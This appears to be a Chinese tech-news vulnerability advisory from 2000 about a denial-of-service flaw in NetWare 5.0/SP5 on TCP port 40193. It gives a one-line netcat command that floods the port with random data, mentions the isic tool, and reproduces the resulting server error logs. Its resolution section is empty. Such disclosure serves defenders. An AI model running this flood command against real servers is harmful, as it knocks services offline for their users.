NetWare 5.0/SP5拒绝服务攻击漏洞

(2000-07-15 00:00 )(不详 )(京九 )
导读-- NetWare5.0/SP5存在一个缓冲区溢出漏洞,如果攻击者通过一台linux的机器连接到同一网络并执行以下命令......
漏洞发布时间:2000-7-1317:39:00
漏洞描述:

NetWare5.0/SP5存在一个缓冲区溢出漏洞,如果攻击者通过一台linux机器连接到同一网络并执行以下命令:
[root@tik/root]#cat/dev/urandom|nc192.168.1.1540193

利用isic同样可以获得相同的效果。

由于NetWareTCP端口40193没有正确的处理TCP碎片包,攻击者能在几分钟内让服务器出现内存分配错:

10-07-200012:29:53pm:SERVER-5.0-4631[nmID=1001C]
WARNING!ServerXXXXXexperiencedacriticalerror.Theoffending
processwassuspendedorrecovered.
However,serviceshostedbythisservermayhavebeenaffected.


连续攻击大约1小时左右,服务器出错起。

10-07-200012:29:53pm:SERVER-5.0-4631[nmID=1001C]
WARNING!ServerXXXXXexperiencedacriticalerror.Theoffending
processwas
suspendedorrecovered.However,serviceshostedbythisservermay
havebeenaffected.

解决方法:

责编:
订阅新闻邮件) (推荐) (打印) (关闭页面) (至顶) (我对此感兴趣
相关文章
笔名:
请您注意:

 遵守国家有关法律、法规,尊重网上道德,承担一切因您的行为而直接或间接引起的法律责任。

 天极网拥有管理笔名和留言的一切权利。